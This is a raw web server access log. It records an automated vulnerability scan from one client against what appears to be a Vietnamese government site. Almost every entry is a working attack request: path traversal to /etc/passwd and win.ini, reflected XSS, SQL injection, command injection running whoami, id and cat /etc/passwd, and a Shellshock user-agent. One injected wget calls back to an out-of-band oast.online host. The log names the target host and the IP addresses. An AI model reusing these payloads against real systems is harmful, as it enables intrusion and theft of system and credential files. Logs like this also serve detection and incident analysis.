Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 615 2023-10-15 16:52:22 103.153.214.94 GET /webui/ g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 202 2023-10-15 16:54:28 103.153.214.94 GET /index.php/bbs/index/download url=/etc/passwd&name=1.txt&local=1 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 205 2023-10-15 16:55:37 103.153.214.94 GET /nacos/v1/auth/users pageNo=1&pageSize=9 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 210 2023-10-15 16:55:39 103.153.214.94 GET /v1/auth/users pageNo=1&pageSize=9 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 205 2023-10-15 16:55:47 103.153.214.94 POST /debug.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 201 2023-10-15 16:57:38 103.153.214.94 GET /WAN_wan.htm .gif 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 204 2023-10-15 16:57:39 103.153.214.94 GET /WAN_wan.htm .gif 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 210 2023-10-15 16:58:41 103.153.214.94 GET /setup.cgi next_file=debug.htm&x=currentsetting.htm 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 203 2023-10-15 17:00:15 103.153.214.94 GET /netcore_get.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 204 2023-10-15 17:01:16 103.153.214.94 GET /_next/image url=/\/\interact.sh/&q=100&w=128&h=128 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 224 2023-10-15 17:06:22 103.153.214.94 GET /_404_><script>alert(1337)</script> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203 2023-10-15 17:06:22 103.153.214.94 GET /status><script>alert(7331)</script> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 201 2023-10-15 17:06:52 103.153.214.94 GET /AdminPage/conf/runCmd cmd=id 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 2 206 2023-10-15 17:09:46 103.153.214.94 GET /admin/cert_download.php file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 301 0 0 209 2023-10-15 17:09:46 103.153.214.94 GET /admin/cert_download.php file=pqpqpqpq.txt&certfile=cert_download.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 301 0 0 201 2023-10-15 17:10:30 103.153.214.94 GET /css_parser.php css=css_parser.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 248 2023-10-15 17:13:04 103.153.214.94 GET /upgrade_handle.php cmd=writeuploaddir&uploaddir=%27;whoami;%27 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 203 2023-10-15 17:13:09 103.153.214.94 GET /website/lang/en_US r=https://interact.sh/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 201 2023-10-15 17:13:43 103.153.214.94 GET /oliver/FileServlet source=serverFile&fileName=c:/windows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 203 2023-10-15 17:16:52 103.153.214.94 POST /reviewInput.php pid=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 206 2023-10-15 17:18:16 103.153.214.94 POST /opennms/j_spring_security_check - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn/opennms/login.jsp 405 0 1 205 2023-10-15 17:20:12 103.153.214.94 GET /opensis/ajax.php modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 206 2023-10-15 17:20:14 103.153.214.94 GET /ajax.php modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 240 2023-10-15 17:25:38 103.153.214.94 GET /index.php s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 211 2023-10-15 17:25:38 103.153.214.94 GET /index.php s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 201 2023-10-15 17:28:11 103.153.214.94 POST /boaform/admin/formTracert - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 https://bcvt.kontum.gov.vn/diag_ping_admin_en.asp 405 0 1 206 2023-10-15 17:28:23 103.153.214.94 GET /cs/career/getSurvey.jsp fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 200 2023-10-15 17:28:25 103.153.214.94 GET /pub/bscw.cgi/30 op=theme&style_name=../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 205 2023-10-15 17:30:42 103.153.214.94 GET /otobo/index.pl Action=ExternalURLJump;URL=http://www.interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 204 2023-10-15 17:31:01 103.153.214.94 GET /pacsone/nocache.php path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 202 2023-10-15 17:32:23 103.153.214.94 POST /login/userverify.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 210 2023-10-15 17:32:25 103.153.214.94 POST /cgi-bin/Maintain/date_config - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 204 2023-10-15 17:32:25 103.153.214.94 GET /webshell4/login.php err=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 203 2023-10-15 17:32:27 103.153.214.94 GET /webshell4/login.php login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201 2023-10-15 17:33:19 103.153.214.94 GET /main/blank message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 202 2023-10-15 17:33:21 103.153.214.94 GET /main/blank message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 17:34:55 103.153.214.94 GET /data/pbootcms.db - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 204 2023-10-15 17:35:20 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 206 2023-10-15 17:35:50 103.153.214.94 GET /login.php/'><svg/onload=alert`2WfF0dpMhu0xlLNO5hrp5wwyZsO`> - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 636 2023-10-15 17:37:00 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 208 2023-10-15 17:41:18 103.153.214.94 GET /api.php c=project&f=index&token=1234&id=news&sort=1+and+extractvalue(1,concat(0x7e,md5(999999999)))+--+ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 0 2 203 2023-10-15 17:45:07 103.153.214.94 GET /phpwiki/index.php/passwd - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 204 2023-10-15 17:46:08 103.153.214.94 GET /pmb/opac_css/getgif.php chemin=../../../../../../etc/passwd&nomgif=p8rh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 206 2023-10-15 17:46:39 103.153.214.94 POST /pmb/opac_css/index.php lvl=search_result&search_type_asked=extended_search 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 201 2023-10-15 17:48:31 103.153.214.94 POST /upload/UploadResourcePic.ashx ResourceID=8382 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 203 2023-10-15 17:52:18 103.153.214.94 POST /debug/pyspidervulntest/run - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 210 2023-10-15 17:53:57 103.153.214.94 GET /assets/php/_devtools/installer/step_2.php installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 221 2023-10-15 17:53:57 103.153.214.94 GET /qcubed/assets/php/_devtools/installer/step_2.php installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 202 2023-10-15 17:54:46 103.153.214.94 POST /directdata/direct/router - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 204 2023-10-15 17:54:48 103.153.214.94 GET /2WfF0bUjFBz8yzb0guZXQ3Ko2Oq.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 201 2023-10-15 17:55:01 103.153.214.94 GET /xml/User/User.xml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 204 2023-10-15 17:55:34 103.153.214.94 GET /QH.aspx responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 203 2023-10-15 17:56:25 103.153.214.94 GET /audit/gui_detail_view.php token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 207 2023-10-15 17:58:49 103.153.214.94 POST /lib/crud/userprocess.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 205 2023-10-15 18:00:53 103.153.214.94 GET / subreddit=news&score=2134%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 213 2023-10-15 18:02:52 103.153.214.94 GET /+../web-inf/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204 2023-10-15 18:04:39 103.153.214.94 GET /resin-doc/resource/tutorial/jndi-appconfig/test inputFile=../../../../../index.jsp 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 210 2023-10-15 18:04:39 103.153.214.94 GET /resin-doc/viewfile/ file=index.jsp 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 204 2023-10-15 18:04:45 103.153.214.94 POST /index.php action=login.index 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 202 2023-10-15 18:06:50 103.153.214.94 POST /j_security_check - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn/user/login 405 0 1 205 2023-10-15 18:06:59 103.153.214.94 GET /tool/log/c.php strip_slashes=system&host=ipconfig 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 209 2023-10-15 18:07:05 103.153.214.94 GET /report/download.php pdf=../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 212 2023-10-15 18:08:12 103.153.214.94 GET /tmp/updateme/sinfor/ad/sys/sys_user.conf - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 220 2023-10-15 18:11:19 103.153.214.94 GET /index.php plot=;wget%20http://ckjv7uic8b6p3donsoogu34cxpyaqaz8k.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 205 2023-10-15 18:11:23 103.153.214.94 POST /search.php searchtype=5 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 203 2023-10-15 18:13:20 103.153.214.94 GET /comment/api/index.php gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(999999999)))),@`%27` 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 636 2023-10-15 18:14:00 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn/diagnostic.html?t=201701020919 405 0 1 212 2023-10-15 18:14:44 103.153.214.94 GET /HelpTheHelpDesk.jsdbx - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 206 2023-10-15 18:17:06 103.153.214.94 GET /config/postProcessing/testNaming pattern=%3Csvg/onload=alert(document.domain)%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 212 2023-10-15 18:21:16 103.153.214.94 POST /sitemap.xml offset=1;SELECT%20IF((SLEEP(6)),1,2356) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 203 2023-10-15 18:21:16 103.153.214.94 POST /sitemap.xml offset=1;SELECT%20IF((SLEEP(16)),1,2356) 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 204 2023-10-15 18:21:40 103.153.214.94 GET /siteminderagent/forms/smpwservices.fcc USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 205 2023-10-15 18:21:40 103.153.214.94 GET /siteminderagent/forms/smaceauth.fcc USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 200 2023-10-15 18:23:02 103.153.214.94 GET /lwa/Webpages/LwaClient.aspx meeturl=aHR0cDovL2NranY3dWljOGI2cDNkb25zb29ncGhzcGFqdGhkanB1aS5vYXN0Lm9ubGluZS8/aWQ9N1o3JTI1ezEzMzcqMTMzN30jLnh4Ly8= 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 204 2023-10-15 18:23:07 103.153.214.94 GET /index.php page=../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 201 2023-10-15 18:23:22 103.153.214.94 GET /index.php _csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&destination=zbuip%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ejgoihbmmygljgoihbmmygl&logMeIn=Login&memberID=admin&memberPassWord=password&p=member 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 202 2023-10-15 18:25:22 103.153.214.94 GET /pacs/nocache.php path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 208 2023-10-15 18:26:00 103.153.214.94 GET /Solar_Image.php mode=resize&fname=test%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 203 2023-10-15 18:26:06 103.153.214.94 GET /cgi-bin/jarrewrite.sh - 443 - 193.123.37.162 "()+{+:;+};+echo+;+/bin/bash+-c+'cat+/etc/passwd'" - 200 0 0 205 2023-10-15 18:26:31 103.153.214.94 GET /cgi-bin/loghandler.php ajax=251&file=/mnt/old-root/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 250 2023-10-15 18:28:50 103.153.214.94 POST /php/ping.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 206 2023-10-15 18:29:32 103.153.214.94 GET /index.php content=../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 201 2023-10-15 18:29:57 103.153.214.94 GET /steve/services/"><script>alert(document.domain)</script>/services/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 203 2023-10-15 18:29:59 103.153.214.94 GET /services/"><script>alert(document.domain)</script>/services/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 202 2023-10-15 18:30:12 103.153.214.94 GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream sn=../../WEB-INF/ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 203 2023-10-15 18:30:12 103.153.214.94 GET /api/ping count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 0 2 214 2023-10-15 18:31:55 103.153.214.94 GET /api/manager/submit group=1&username=jy4akb&password=hKHfLOUqjNxp 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 0 2 228 2023-10-15 18:33:20 103.153.214.94 GET /cgi-bin/log.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 228 2023-10-15 18:33:55 103.153.214.94 GET /api/sso/v2/sso/jwt error_url=http://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 0 2 222 2023-10-15 18:34:55 103.153.214.94 POST /thruk/cgi-bin/login.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 204 2023-10-15 18:40:52 103.153.214.94 GET /api/dbstat/gettablessize - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 0 2 219 2023-10-15 18:41:54 103.153.214.94 GET /tiki-5.2/tiki-edit_wiki_section.php type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 218 2023-10-15 18:41:55 103.153.214.94 GET /tiki-edit_wiki_section.php type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E 443 - 193.123.37.162 